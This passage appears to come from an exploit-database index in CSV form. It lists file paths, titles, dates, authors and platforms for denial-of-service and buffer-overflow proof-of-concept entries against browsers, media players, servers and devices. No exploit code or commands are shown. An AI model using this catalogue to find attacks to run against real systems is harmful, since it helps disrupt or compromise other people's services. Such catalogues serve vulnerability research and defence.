Excel 95/97/2000/2002/2003/2004 - Memory Corruption (MS06-012)",2005-12-19,ad@heapoverflow.com,windows,dos, -26886,exploits/linux/dos/26886.pl,"Squid 3.3.5 - Denial of Service (PoC)",2013-07-16,kingcope,linux,dos, -26887,exploits/linux/dos/26887.rb,"rpcbind - CALLIT procedure UDP Crash (PoC)",2013-07-16,"Sean Verity",linux,dos, -26891,exploits/windows/dos/26891.py,"Light Audio Mixer 1.0.12 - '.wav' Crash (PoC)",2013-07-16,ariarat,windows,dos, -26892,exploits/windows/dos/26892.py,"Kate's Video Toolkit 7.0 - '.wav' Crash (PoC)",2013-07-16,ariarat,windows,dos, -26915,exploits/linux/dos/26915.txt,"Blender BlenLoader 2.x - File Processing Integer Overflow",2005-12-20,"Damian Put",linux,dos, -26922,exploits/multiple/dos/26922.pl,"Interaction SIP Proxy 3.0 - Remote Heap Corruption Denial of Service",2005-12-21,"Behrang Fouladi",multiple,dos, -26951,exploits/windows/dos/26951.py,"Microsoft Windows Movie Maker 2.1.4026.0 - '.wav' Crash (PoC)",2013-07-18,ariarat,windows,dos, -26967,exploits/multiple/dos/26967.txt,"httprint 202.0 - HTTP Response Server Field Overflow Denial of Service",2005-12-22,"Mariano Nunez Di Croce",multiple,dos, -26971,exploits/osx/dos/26971.txt,"Apple Mac OSX - KHTMLParser Remote Denial of Service",2005-12-22,"Tom Ferris",osx,dos, -26985,exploits/windows/dos/26985.txt,"Microsoft Internet Explorer 5.0.1 - HTML Parsing Denial of Service",2005-12-27,"Christian Deneke",windows,dos, -27010,exploits/windows/dos/27010.txt,"VbsEdit 5.9.3 - '.smi' Buffer Overflow",2013-07-22,d3b4g,windows,dos, -27026,exploits/multiple/dos/27026.txt,"Intel Graphics Accelerator Driver - Remote Denial of Service",2006-01-03,"Sumit Siddharth",multiple,dos, -27031,exploits/linux/dos/27031.c,"Linux Kernel 2.6.x - SET_MEMPOLICY Local Denial of Service",2006-01-04,"Doug Chapman",linux,dos, -27043,exploits/hardware/dos/27043.py,"Samsung PS50C7700 TV - Denial of Service",2013-07-23,"Malik Mesellem",hardware,dos,5600 -27047,exploits/windows/dos/27047.txt,"Artweaver 3.1.5 - '.awd' Buffer Overflow",2013-07-23,"Core Security",windows,dos, -27049,exploits/windows/dos/27049.txt,"XnView 2.03 - '.pct' Buffer Overflow",2013-07-23,"Core Security",windows,dos, -27050,exploits/windows/dos/27050.txt,"Microsoft DirectShow - Arbitrary Memory Overwrite (MS13-056)",2013-07-23,"Andrés Gómez Ramírez",windows,dos, -27051,exploits/windows/dos/27051.txt,"Microsoft Windows - Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities",2006-01-09,cocoruder,windows,dos, -27055,exploits/windows/dos/27055.txt,"Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos, -27069,exploits/windows/dos/27069.txt,"Apple QuickTime 6.4/6.5/7.0.x - PictureViewer '.JPEG'/.PICT' File Buffer Overflow",2006-01-11,"Dennis Rand",windows,dos, -27082,exploits/windows/dos/27082.txt,"Microsoft Internet Explorer 5.0.1 - Malformed .IMG / .XML Parsing Denial of Service",2006-01-16,"Inge Henriksen",windows,dos, -27089,exploits/windows/dos/27089.c,"CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (1)",2006-01-11,ZwelL,windows,dos, -27090,exploits/windows/dos/27090.c,"CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (2)",2006-01-15,ZwelL,windows,dos, -27094,exploits/multiple/dos/27094.txt,"AmbiCom Blue Neighbors 2.50 build 2500 - BlueTooth Stack Object Push Buffer Overflow",2006-01-16,"Kevin Finisterre",multiple,dos, -27101,exploits/windows/dos/27101.txt,"Computer Associates Unicenter 6.0 - Remote Control DM Primer Remote Denial of Service",2006-01-17,Karma,windows,dos, -27108,exploits/multiple/dos/27108.txt,"Dual DHCP DNS Server 1.0 - DHCP Options Remote Buffer Overflow",2006-01-07,"Luigi Auriemma",multiple,dos, -27113,exploits/windows/dos/27113.c,"BitComet 0.60 - '.Torrent' File Handling Remote Buffer Overflow",2006-01-19,"Dejun Meng",windows,dos, -27131,exploits/hardware/dos/27131.py,"Galil-RIO Modbus - Denial of Service",2013-07-27,Sapling,hardware,dos, -27140,exploits/multiple/dos/27140.txt,"Exiv2 - Corrupted EXIF Data Denial of Service",2006-01-26,"Maciek Wierciski",multiple,dos, -27144,exploits/linux/dos/27144.py,"CommuniGate Pro 5.0.6 - Server LDAP Denial of Service",2006-01-28,"Evgeny Legerov",linux,dos, -27145,exploits/linux/dos/27145.txt,"GNOME Evolution 2.2.3/2.3.x - Inline XML File Attachment Buffer Overflow",2006-01-28,"Mike Davis",linux,dos, -27159,exploits/multiple/dos/27159.txt,"Fcron 3.0 - Convert-FCronTab Local Buffer Overflow",2006-02-01,"Adam Zabrocki",multiple,dos, -27171,exploits/multiple/dos/27171.txt,"Sun ONE Directory Server 5.2 - Remote Denial of Service",2006-02-08,"Evgeny Legerov",multiple,dos, -27196,exploits/multiple/dos/27196.txt,"IBM Tivoli Directory Server 6.0 - LDAP Memory Corruption",2006-02-11,"Evgeny Legerov",multiple,dos, -27210,exploits/multiple/dos/27210.txt,"eStara SoftPhone 3.0.1 - SIP SDP Message Handling Format String Denial of Service",2006-02-14,ZwelL,multiple,dos, -27211,exploits/multiple/dos/27211.txt,"eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities",2006-02-14,ZwelL,multiple,dos, -27212,exploits/multiple/dos/27212.txt,"Isode M-Vault Server 11.3 - LDAP Memory Corruption",2006-02-14,"Evgeny Legerov",multiple,dos, -27232,exploits/hardware/dos/27232.txt,"Nokia N70 - L2CAP Packets Remote Denial of Service",2006-02-15,"Pierre Betouin",hardware,dos, -27241,exploits/hardware/dos/27241.c,"D-Link DWL-G700AP 2.00/2.01 - HTTPD Denial of Service",2006-02-16,l0om,hardware,dos, -27246,exploits/linux/dos/27246.txt,"Mozilla Thunderbird 1.5 - Address Book Import Remote Denial of Service",2006-02-17,DrFrancky,linux,dos, -27253,exploits/linux/dos/27253.txt,"Mozilla Firefox 1.0.x/1.5 - HTML Parsing Denial of Service",2006-02-21,"Yuan Qi",linux,dos, -27257,exploits/linux/dos/27257.html,"Mozilla (Multiple Products) - iFrame JavaScript Execution",2006-02-22,"Georgi Guninski",linux,dos, -27258,exploits/asp/dos/27258.txt,"Ipswitch WhatsUp Professional 2006 - Remote Denial of Service",2006-02-22,"Josh Zlatin-Amishav",asp,dos, -27273,exploits/windows/dos/27273.txt,"TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) Crash (PoC)",2013-08-02,d3b4g,windows,dos, -27292,exploits/windows/dos/27292.py,"EchoVNC Viewer - Remote Denial of Service",2013-08-02,Z3r0n3,windows,dos, -27317,exploits/windows/dos/27317.txt,"StarUML - 'WinGraphviz.dll' ActiveX Buffer Overflow",2013-08-03,d3b4g,windows,dos, -27329,exploits/windows/dos/27329.txt,"Alt-N MDaemon 8.1.1 IMAP Server - Remote Format String",2006-02-27,Nemesis,windows,dos, -27365,exploits/multiple/dos/27365.txt,"Monopd 0.9.3 - Remote Denial of Service",2006-03-06,"Luigi Auriemma",multiple,dos, -27377,exploits/windows/dos/27377.txt,"Easy File Sharing Web Server 3.2 - Format String Denial of Service",2006-03-09,"Revnic Vasile",windows,dos, -27407,exploits/windows/dos/27407.pl,"UnrealIRCd 3.x - Remote Denial of Service",2006-03-09,"Brandon Milner",windows,dos, -27418,exploits/windows/dos/27418.txt,"Firebird 1.5 - Inet_Server Local Buffer Overflow",2006-03-13,"Joxean Koret",windows,dos, -27420,exploits/multiple/dos/27420.c,"ENet - Multiple Denial of Service Vulnerabilities",2006-03-13,"Luigi Auriemma",multiple,dos, -27421,exploits/multiple/dos/27421.txt,"GGZ Gaming Zone 0.0.12 - Multiple Denial of Service Vulnerabilities",2006-03-14,"Luigi Auriemma",multiple,dos, -27425,exploits/linux/dos/27425.txt,"Zoo 2.10 - Parse.c Local Buffer Overflow",2006-03-16,"Josh Bressers",linux,dos, -27460,exploits/multiple/dos/27460.pl,"RealNetworks (Multiple Products) - Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",multiple,dos, -27474,exploits/multiple/dos/27474.txt,"LibVC - '.VCard' 003 Processing Buffer Overflow",2006-03-21,trew,multiple,dos, -27476,exploits/windows/dos/27476.txt,"Microsoft .NET Framework SDK 1.0/1.1 - MSIL Tools Buffer Overflow",2006-03-27,"Dinis Cruz",windows,dos, -27727,exploits/windows/dos/27727.txt,"Microsoft Internet Explorer 6 - Nested OBJECT Tag Memory Corruption",2006-04-22,"Michal Zalewski",windows,dos, -27547,exploits/multiple/dos/27547.txt,"Zdaemon 1.8.1 - Multiple Vulnerabilities",2006-03-31,"Luigi Auriemma",multiple,dos, -27553,exploits/windows/dos/27553.py,"OneHTTPD 0.7 - Denial of Service",2013-08-13,superkojiman,windows,dos,8080 -27566,exploits/multiple/dos/27566.txt,"Doomsday 1.8/1.9 - Multiple Remote Format String Vulnerabilities",2005-04-03,"Luigi Auriemma",multiple,dos, -27581,exploits/linux/dos/27581.txt,"Tony Cook Imager 0.4x - '.JPEG' / '.TGA' Images Denial of Service",2006-04-07,"Kjetil Kjernsmo",linux,dos, -27635,exploits/linux/dos/27635.txt,"Mozilla Firefox 1.0.x/1.5 - HTML Parsing Null Pointer Dereference Denial of Service",2006-04-13,"Thomas Waldegger",linux,dos, -27639,exploits/multiple/dos/27639.txt,"W3C Amaya 9.4 - textarea rows Attribute Value Overflow",2006-04-13,"Thomas Waldegger",multiple,dos, -27640,exploits/multiple/dos/27640.txt,"W3C Amaya 9.4 - legend color Attribute Value Overflow",2006-04-13,"Thomas Waldegger",multiple,dos, -27641,exploits/linux/dos/27641.txt,"Opera Web Browser 8.52 - Stylesheet Attribute Buffer Overflow",2006-04-13,"SEC Consult",linux,dos, -27969,exploits/multiple/dos/27969.c,"Quake 3 Engine - 'CL_ParseDownload' Remote Buffer Overflow",2006-06-05,"Luigi Auriemma",multiple,dos, -27971,exploits/windows/dos/27971.txt,"Microsoft Internet Explorer 5.0.1 - Frameset Memory Corruption",2006-06-05,Kil13r,windows,dos, -27668,exploits/multiple/dos/27668.c,"Neon Responders 5.4 - Remote Clock Synchronization Denial of Service",2006-04-10,"Stefan Lochbihler",multiple,dos, -27670,exploits/linux/dos/27670.txt,"Xine 0.9/1.0 - Playlist Handling Remote Format String",2006-04-18,c0ntexb,linux,dos, -27700,exploits/windows/dos/27700.py,"VideoLAN VLC Media Player 2.0.8 - '.m3u' Local Crash (PoC)",2013-08-19,Asesino04,windows,dos, -27714,exploits/osx/dos/27714.txt,"Apple Mac OSX 10.x - LZWDecodeVector '.tiff' Overflow",2006-04-20,"Tom Ferris",osx,dos, -27715,exploits/osx/dos/27715.txt,"Apple Mac OSX 10.x - '.zip' BOMStackPop()' Overflow",2006-04-20,"Tom Ferris",osx,dos, -27723,exploits/linux/dos/27723.txt,"Yukihiro Matsumoto Ruby 1.x - XMLRPC Server Denial of Service",2006-04-21,"Tanaka Akira",linux,dos, -27730,exploits/multiple/dos/27730.py,"Lotus Domino 7.0.x/8.0/8.5 - LDAP Message Remote Denial of Service",2006-04-24,"Evgeny Legerov",multiple,dos, -27745,exploits/windows/dos/27745.txt,"Outlook Express 5.5/6.0 / Windows Mail - MHTML URI Handler Information Disclosure",2006-04-27,codedreamer,windows,dos, -27749,exploits/hardware/dos/27749.rb,"Schneider Electric PLC ETY Series Ethernet Controller - Denial of Service",2013-08-21,"Arash Abedian",hardware,dos, -27762,exploits/linux/dos/27762.txt,"LibTiff 3.x - Multiple Denial of Service Vulnerabilities",2006-04-28,"Tavis Ormandy",linux,dos, -27764,exploits/linux/dos/27764.txt,"LibTiff 3.x - TIFFFetchData Integer Overflow",2006-04-28,"Tavis Ormandy",linux,dos, -27765,exploits/linux/dos/27765.txt,"LibTiff 3.x - Double-Free Memory Corruption",2008-04-28,"Tavis Ormandy",linux,dos, -27856,exploits/linux/dos/27856.txt,"GNU BinUtils 2.1x - Buffer Overflow",2006-05-11,"Jesus Olmos Gonzalez",linux,dos, -27775,exploits/hardware/dos/27775.py,"NETGEAR ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",hardware,dos, -27778,exploits/linux/dos/27778.txt,"Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow",2013-08-22,x90c,linux,dos,139 -27790,exploits/osx/dos/27790.txt,"Apple Mac OSX 10.x - ImageIO OpenEXR Image File Remote Denial of Service",2006-05-01,Christian,osx,dos, -27791,exploits/linux/dos/27791.txt,"Xine 0.99.x - Filename Handling Remote Format String",2006-05-01,KaDaL-X,linux,dos, -27850,exploits/windows/dos/27850.txt,"Microsoft Infotech Storage Library - Heap Corruption",2006-05-09,"Ruben Santamarta",windows,dos, -27875,exploits/linux/dos/27875.c,"libtiff 3.9.5 - Integer Overflow",2013-08-26,x90c,linux,dos, -27882,exploits/java/dos/27882.java,"Sun Java Applet - Font.createFont Remote Denial of Service",2006-05-15,"Marc Schoenefeld",java,dos, -27901,exploits/multiple/dos/27901.java,"Sun Java Runtime Environment 1.3/1.4/1.5 - Nested Array Objects Denial of Service",2006-05-22,"Marc Schoenefeld",multiple,dos, -27903,exploits/linux/dos/27903.txt,"Dia 0.8x/0.9x - Filename Remote Format String",2006-05-23,KaDaL-X,linux,dos, -27906,exploits/windows/dos/27906.txt,"Microsoft Internet Explorer 6 - Malformed HTML Parsing Denial of Service (2)",2006-05-26,"Thomas Waldegger",windows,dos, -27914,exploits/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - IMAP Unauthenticated Remote Buffer Overflow",2006-05-29,kcope,windows,dos, -27915,exploits/multiple/dos/27915.pl,"Apache James 2.2 - SMTP Denial of Service",2006-05-29,y3dips,multiple,dos, -27925,exploits/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",linux,dos, -27930,exploits/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow",2006-05-31,Mr.Niega,windows,dos, -27942,exploits/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos, -40907,exploits/windows/dos/40907.html,"Microsoft Internet Explorer 9 - IEFRAME CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)",2016-12-12,Skylined,windows,dos, -27993,exploits/multiple/dos/27993.txt,"FreeType - '.TTF' File Remote Denial of Service",2006-06-08,"Josh Bressers",multiple,dos, -27981,exploits/linux/dos/27981.c,"GD Graphics Library 2.0.33 - Remote Denial of Service",2006-06-06,"Xavier Roche",linux,dos, -28001,exploits/windows/dos/28001.c,"Microsoft SMB Driver - Local Denial of Service",2006-06-13,"Ruben Santamarta",windows,dos, -28026,exploits/linux/dos/28026.txt,"MySQL Server 4/5 - Str_To_Date Remote Denial of Service",2006-06-14,Kanatoko,linux,dos, -28065,exploits/multiple/dos/28065.vmx,"VMware Player 1.0.1 Build 19317 - '.VMX' File Denial of Service",2006-06-19,n00b,multiple,dos, -28077,exploits/linux/dos/28077.txt,"GnuPG 1.4.3/1.9.x - Parse_User_ID Remote Buffer Overflow",2006-06-20,"Evgeny Legerov",linux,dos, -28079,exploits/windows/dos/28079.py,"jetAudio 8.0.16.2000 Plus VX - '.wav' Crash (PoC)",2013-09-04,ariarat,windows,dos, -28080,exploits/windows/dos/28080.py,"GOMPlayer 2.2.53.5169 - '.wav' Crash (PoC)",2013-09-04,ariarat,windows,dos, -28087,exploits/windows/dos/28087.txt,"Microsoft Office 2003 - Embedded Shockwave Flash Object Security Bypass",2006-06-22,"Debasis Mohanty",windows,dos, -28099,exploits/windows/dos/28099.txt,"Yahoo! Messenger 7.0/7.5 - 'jscript.dll' Non-ASCII Character Denial of Service",2006-06-23,"Ivan Ivan",windows,dos, -28100,exploits/cfm/dos/28100.txt,"BlueDragon Server 6.2.1 - '.cfm' Denial of Service",2006-06-23,"Tan Chew Keong",cfm,dos, -28103,exploits/windows/dos/28103.pl,"MailEnable 1.x - SMTP HELO Command Remote Denial of Service",2006-06-24,db0,windows,dos, -28135,exploits/osx/dos/28135.pl,"Apple Mac OSX 10.4.x - OpenLDAP Denial of Service",2006-06-27,"Mu Security research",osx,dos, -28144,exploits/windows/dos/28144.txt,"Microsoft Internet Explorer 6 - OutlookExpress.AddressBook Denial of Service",2006-07-01,hdm,windows,dos, -28145,exploits/windows/dos/28145.html,"Microsoft Internet Explorer 6 - ADODB.Recordset Filter Property Denial of Service",2006-07-03,hdm,windows,dos, -28160,exploits/linux/dos/28160.txt,"Gentoo-Specific MPG123 - URI Remote Buffer Overflow",2006-07-03,"Horst Schirmeier",linux,dos, -28164,exploits/windows/dos/28164.html,"Microsoft Internet Explorer 6 - Href Title Denial of Service",2006-07-04,jsz,windows,dos, -28165,exploits/osx/dos/28165.html,"Apple Safari Web Browser 2.0.4 - DHTML SetAttributeNode() Null Dereference Denial of Service",2006-07-05,"Dennis Cox",osx,dos, -28169,exploits/windows/dos/28169.html,"Microsoft Internet Explorer 5.0.1/6.0 - Structured Graphics Control Denial of Service",2006-07-06,hdm,windows,dos, -28182,exploits/multiple/dos/28182.java,"MICO Object Key 2.3.12 - Remote Denial of Service",2006-07-06,tuergeist,multiple,dos, -28194,exploits/windows/dos/28194.txt,"Microsoft Internet Explorer 6 - RDS.DataControl Denial of Service",2006-07-08,hdm,windows,dos, -28196,exploits/windows/dos/28196.txt,"Microsoft Internet Explorer 6 - DirectAnimation.DAUserData Denial of Service",2006-07-08,hdm,windows,dos, -28197,exploits/windows/dos/28197.txt,"Microsoft Internet Explorer 6 - Object.Microsoft.DXTFilter Denial of Service",2006-07-09,hdm,windows,dos, -28202,exploits/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - 'HtmlDlgSafeHelper' Remote Denial of Service",2006-07-10,hdm,windows,dos, -28207,exploits/windows/dos/28207.txt,"Microsoft Internet Explorer 6 - TriEditDocument Denial of Service",2006-07-11,hdm,windows,dos, -28213,exploits/windows/dos/28213.txt,"Microsoft Internet Explorer 6 - RevealTrans Denial of Service",2006-07-12,hdm,windows,dos, -28220,exploits/linux/dos/28220.txt,"KDE Konqueror 3.5.x - ReplaceChild Denial of Service",2006-07-14,hdm,linux,dos, -28222,exploits/windows/dos/28222.txt,"Microsoft Works 8.0 Spreadsheet - Multiple Vulnerabilities",2006-06-14,"Benjamin Franz",windows,dos, -28227,exploits/windows/dos/28227.txt,"Microsoft Windows XP/2000 - Registry Access Local Denial of Service",2006-07-15,"David Matousek",windows,dos, -28228,exploits/hardware/dos/28228.txt,"Sunbelt Kerio Personal Firewall 4.3.426 - CreateRemoteThread Denial of Service",2006-07-15,"David Matousek",hardware,dos, -28230,exploits/hardware/dos/28230.txt,"D-Link Routers - UPNP Buffer Overflow",2006-07-17,"Barnaby Jack",hardware,dos, -28232,exploits/windows/dos/28232.txt,"Agnitum Outpost Firewall 3.5.631 - 'FiltNT.SYS' Local Denial of Service",2006-07-17,"Bipin Gautam",windows,dos, -28234,exploits/linux/dos/28234.txt,"MySQL 4.x/5.x - Server Date_Format Denial of Service",2006-07-18,"Christian Hammers",linux,dos, -28237,exploits/windows/dos/28237.py,"Target Longlife Media Player 2.0.2.0 - '.wav' Crash (PoC)",2013-09-12,gunslinger_,windows,dos, -28395,exploits/windows/dos/28395.txt,"VMware 5.5.1 - Partition Table Deletion Denial of Service",2006-08-15,nop,windows,dos, -28244,exploits/windows/dos/28244.txt,"Microsoft Internet Explorer 6 - DataSourceControl Denial of Service",2006-07-19,hdm,windows,dos, -28246,exploits/windows/dos/28246.txt,"Microsoft Internet Explorer 6 - OVCtl Denial of Service",2006-07-19,hdm,windows,dos, -28252,exploits/windows/dos/28252.txt,"Microsoft Internet Explorer 6 - String To Binary Function Denial of Service",2006-07-20,hdm,windows,dos, -28256,exploits/windows/dos/28256.html,"Microsoft Internet Explorer 6 - Internet.HHCtrl Click Denial of Service",2006-07-22,"Alex F",windows,dos, -28257,exploits/linux/dos/28257.txt,"GnuPG 1.4/1.9 - Parse_Comment Remote Buffer Overflow",2006-07-22,"Evgeny Legerov",linux,dos, -28258,exploits/windows/dos/28258.txt,"Microsoft Internet Explorer 6 - Multiple Object ListWidth Property Denial of Service Vulnerabilities",2006-07-23,hdm,windows,dos, -28259,exploits/windows/dos/28259.txt,"Microsoft Internet Explorer 6 - NMSA.ASFSourceMediaDescription Stack Overflow",2006-07-24,hdm,windows,dos, -28263,exploits/windows/dos/28263.c,"Microsoft Windows XP/2000/2003 - Remote Denial of Service",2006-07-24,"J. Oquendo",windows,dos, -28265,exploits/windows/dos/28265.txt,"Microsoft Internet Explorer 6 - Native Function Iterator Denial of Service",2006-07-24,hdm,windows,dos, -28266,exploits/windows/dos/28266.txt,"AGEphone 1.28/1.38 - SIP Packet Handling Buffer Overflow",2006-07-24,"Tan Chew Keong",windows,dos, -28271,exploits/hardware/dos/28271.py,"Vestel TV 42pf9322 - Denial of Service",2013-09-13,HackerSofi,hardware,dos,111 -28277,exploits/multiple/dos/28277.txt,"Opera Web Browser 9 - CSS Background URI Memory Corruption",2006-07-25,hdm,multiple,dos, -28286,exploits/windows/dos/28286.txt,"Microsoft Internet Explorer 6 - NDFXArtEffects Stack Overflow",2006-07-27,hdm,windows,dos, -28293,exploits/multiple/dos/28293.txt,"Oracle 10g - Alter Session Integer Overflow",2006-07-27,"putosoft softputo",multiple,dos, -28299,exploits/windows/dos/28299.pl,"Microsoft Windows XP/2000/2003 - Graphical Device Interface Plus Library Denial of Service",2006-07-29,"Mr. Niega",windows,dos, -28301,exploits/windows/dos/28301.txt,"Microsoft Internet Explorer 6 - Deleted Frame Object Denial of Service",2006-07-29,hdm,windows,dos, -40639,exploits/windows/dos/40639.py,"Baby FTP server 1.24 - Denial of Service (2)",2016-10-27,n30m1nd,windows,dos, -28338,exploits/linux/dos/28338.txt,"Vino VNC Server 3.7.3 - Persistent Denial of Service",2013-09-17,"Trustwave's SpiderLabs",linux,dos,5900 -28341,exploits/windows/dos/28341.txt,"Yahoo! Messenger 8.0.0.863 - File Extension Spoofing",2006-08-04,ivancool2003,windows,dos, -28343,exploits/windows/dos/28343.txt,"Microsoft Internet Explorer 6.0/7.0 - IFrame Refresh Denial of Service",2006-08-06,"Thomas Pollet",windows,dos, -28345,exploits/multiple/dos/28345.txt,"DConnect Daemon DC Chat - Denial of Service",2006-08-06,"Luigi Auriemma",multiple,dos, -28348,exploits/linux/dos/28348.txt,"Clam Anti-Virus ClamAV 0.88.x - UPX Compressed PE File Heap Buffer Overflow",2006-08-07,"Damian Put",linux,dos, -28358,exploits/linux/dos/28358.txt,"Linux Kernel 2.6.17.7 - NFS and EXT3 Combination Remote Denial of Service",2006-08-07,"James McKenzie",linux,dos, -28361,exploits/multiple/dos/28361.c,"Festalon 0.5 - '.HES' Remote Heap Buffer Overflow",2006-08-07,"Luigi Auriemma",multiple,dos, -28367,exploits/linux/dos/28367.txt,"AlsaPlayer 0.99.x - Multiple Buffer Overflow Vulnerabilities",2006-08-09,"Luigi Auriemma",linux,dos, -28369,exploits/windows/dos/28369.dpr,"IrfanView 3.98 - '.ANI' Image File Denial of Service",2006-08-09,sehato,windows,dos, -28375,exploits/windows/dos/28375.pl,"TeraCopy 2.3 - 'default.mo' Language File Integer Overflow",2013-09-18,LiquidWorm,windows,dos, -28380,exploits/linux/dos/28380.txt,"Mozilla Firefox 1.0.x - JavaScript Handler Race Condition Memory Corruption",2006-08-12,"Michal Zalewski",linux,dos, -28381,exploits/windows/dos/28381.txt,"Microsoft Windows XP/2000/2003 help - Multiple Vulnerabilities",2006-08-12,"Benjamin Tobias Franz",windows,dos, -28383,exploits/linux/dos/28383.txt,"ImageMagick 6.x - '.SGI' Image File Remote Heap Buffer Overflow",2006-08-14,"Damian Put",linux,dos, -28384,exploits/linux/dos/28384.txt,"Libmusicbrainz 2.0.2/2.1.x - Multiple Buffer Overflow Vulnerabilities",2006-08-14,"Luigi Auriemma",linux,dos, -28386,exploits/linux/dos/28386.txt,"Linux-HA Heartbeat 2.0.6 - Remote Denial of Service",2006-08-13,"Yan Rong Ge",linux,dos, -28387,exploits/windows/dos/28387.html,"Microsoft Internet Explorer 6 - 'IMSKDIC.dll' Denial of Service",2006-08-15,nop,windows,dos, -28389,exploits/windows/dos/28389.html,"Microsoft Internet Explorer 6 - 'MSOE.dll' Denial of Service",2006-08-15,nop,windows,dos, -28391,exploits/linux/dos/28391.html,"Mozilla Firefox 1.x - XML Handler Race Condition Memory Corruption",2006-08-15,"Michal Zalewski",linux,dos, -28401,exploits/windows/dos/28401.html,"Microsoft Internet Explorer 6 - Visual Studio COM Object Instantiation Denial of Service",2006-08-08,XSec,windows,dos, -28420,exploits/windows/dos/28420.html,"Microsoft Windows Server 2000 - Multiple COM Object Instantiation Code Execution Vulnerabilities",2006-08-21,nop,windows,dos, -28421,exploits/windows/dos/28421.html,"Microsoft Internet Explorer 6 - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,XSec,windows,dos, -28463,exploits/windows/dos/28463.html,"SolarWinds Server and Application Monitor - ActiveX 'Pepco32c' Buffer Overflow",2013-09-22,blake,windows,dos, -28451,exploits/windows/dos/28451.txt,"Share KM 1.0.19 - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos, -28469,exploits/windows/dos/28469.txt,"Internet Security Systems 3.6 BlackICE - Local Denial of Service",2006-09-01,"David Matousek",windows,dos, -28491,exploits/multiple/dos/28491.txt,"DSocks 1.3 - 'Name' Buffer Overflow",2006-09-05,"Michael Adams",multiple,dos, -28513,exploits/windows/dos/28513.txt,"Paul Smith Computer Services VCAP Calendar Server 1.9 - Remote Denial of Service",2006-09-12,"securma massine",windows,dos, -28521,exploits/osx/dos/28521.txt,"Apple QuickTime 6/7 - '.FLC' Movie COLOR_64 Chunk Overflow",2006-09-12,Sowhat,osx,dos, -28542,exploits/multiple/dos/28542.pl,"Verso NetPerformer Frame Relay Access Device - Telnet Buffer Overflow",2006-09-13,"Arif Jatmoko",multiple,dos, -28561,exploits/multiple/dos/28561.pl,"Blast XPlayer - Local Buffer Overflow (PoC)",2013-09-26,flux77,multiple,dos, -28578,exploits/osx/dos/28578.txt,"Apple Mac OSX 10.x - KExtLoad Buffer Overflow",2006-09-14,"Adriel T. Desautels",osx,dos, -28588,exploits/windows/dos/28588.txt,"Symantec (Multiple Products) - 'SymEvent' Driver Local Denial of Service",2006-09-15,"David Matousek",windows,dos, -28648,exploits/freebsd/dos/28648.c,"FreeBSD 5.x - 'I386_Set_LDT()' Multiple Local Denial of Service Vulnerabilities",2006-09-23,"Adriano Lima",freebsd,dos, -28650,exploits/windows/dos/28650.py,"KMPlayer 3.7.0.109 - '.wav' Crash (PoC)",2013-09-30,xboz,windows,dos, -28666,exploits/multiple/dos/28666.txt,"Call of Duty Server 4.1.x - Callvote Map Command Remote Buffer Overflow",2006-09-25,"Luigi Auriemma",multiple,dos, -28726,exploits/multiple/dos/28726.pl,"OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service",2006-09-28,"Noam Rathaus",multiple,dos, -28679,exploits/multiple/dos/28679.txt,"Evince PDF Reader 2.32.0.145 (Windows) / 3.4.0 (Linux) - Denial of Service",2013-10-02,Deva,multiple,dos, -28683,exploits/linux/dos/28683.txt,"HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow",2013-10-02,"Dennis Jenkins",linux,dos, -28735,exploits/windows/dos/28735.pl,"MailEnable 2.x - SMTP NTLM Multiple Authentication Vulnerabilities",2006-11-29,mu-b,windows,dos, -28739,exploits/hardware/dos/28739.pl,"Motorola SB4200 - Remote Denial of Service",2006-10-03,"Dave Gil",hardware,dos, -28775,exploits/linux/dos/28775.pl,"Zabbix 1.1.2 - Multiple Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos, -28785,exploits/windows/dos/28785.c,"Google Earth 4.0.2091 (Beta) - '.KML'/'.KMZ' Buffer Overflow",2006-09-14,JAAScois,windows,dos, -30208,exploits/windows/dos/30208.txt,"IcoFX 2.5.0.0 - '.ico' Buffer Overflow",2013-12-11,"Core Security",windows,dos, -28811,exploits/osx/dos/28811.txt,"Apple Motion 5.0.7 - Integer Overflow",2013-10-08,"Jean Pascal Pereira",osx,dos, -28812,exploits/freebsd/dos/28812.c,"FreeBSD 5.5/6.x - Scheduler Policy Local Denial of Service",2006-10-13,"Diane Bruce",freebsd,dos, -28813,exploits/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 - Ftrucante Local Denial of Service",2006-10-13,"Kirk Russell",freebsd,dos, -28816,exploits/linux/dos/28816.txt,"KMail 1.x - HTML Element Handling Denial of Service",2006-10-16,nnp,linux,dos, -28822,exploits/windows/dos/28822.txt,"Microsoft Class Package Export Tool 5.0.2752 - 'Clspack.exe' Local Buffer Overflow",2006-10-16,mmd_000,windows,dos, -28834,exploits/windows/dos/28834.txt,"Microsoft Windows XP - 'cmd.exe' Buffer Overflow",2006-10-20,"Alberto Cortes",windows,dos, -28852,exploits/hardware/dos/28852.py,"ONO Hitron CDE-30364 Router - Denial of Service",2013-10-10,"Matias Mingorance Svensson",hardware,dos,80 -28855,exploits/windows/dos/28855.txt,"ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (PoC)",2013-10-10,metacom,windows,dos, -28860,exploits/windows/dos/28860.c,"FtpXQ Server 3.01 - MKD Command Remote Overflow Denial of Service",2006-10-24,"Federico Fazzi",windows,dos, 